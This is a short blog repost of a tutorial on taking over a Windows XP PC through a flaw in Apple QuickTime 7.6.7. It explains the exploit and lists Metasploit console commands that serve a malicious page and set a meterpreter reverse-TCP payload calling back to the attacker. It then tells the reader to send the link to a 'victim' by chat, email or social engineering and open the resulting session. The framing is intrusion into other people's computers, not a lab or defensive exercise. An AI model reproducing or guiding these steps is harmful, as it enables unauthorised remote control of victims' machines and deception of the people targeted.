lunes, 26 de enero de 2015

How to Hack Remote PC using Apple QuickTime

Apple QuickTime 7.6.7_Marshaled_pUnk Code Execution Metaspolit Exploit
This module exploits a memory trust issue in Apple QuickTime 7.6.7 when processing a specially-crafted HTML page; the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. NOTE: The addresses may need to be adjusted for older versions of QuickTime.
Exploit Targets
Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/apple_quicktime_marshaled_punk
Msf exploit (apple_quicktime_marshaled_punk)>set payload windows/meterpreter/reverse_tcp
Msf exploit (apple_quicktime_marshaled_punk)>set lhost 192.168.1.4 (IP of Local Host)
Msf exploit (apple_quicktime_marshaled_punk)>set srvhost 192.168.1.4 (This must be an address on the local machine)
Msf exploit (apple_quicktime_marshaled_punk)>set uripath appleplayer (The Url to use for this exploit)
Msf exploit (apple_quicktime_marshaled_punk)>exploit

Now an URL you should give to your victim http://192.168.1.4:8080/appleplayer

Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID


Fuente:http://www.hackingarticles.in/how-to-hack-remote-pc-using-apple-quicktime/

No hay comentarios:

Publicar un comentario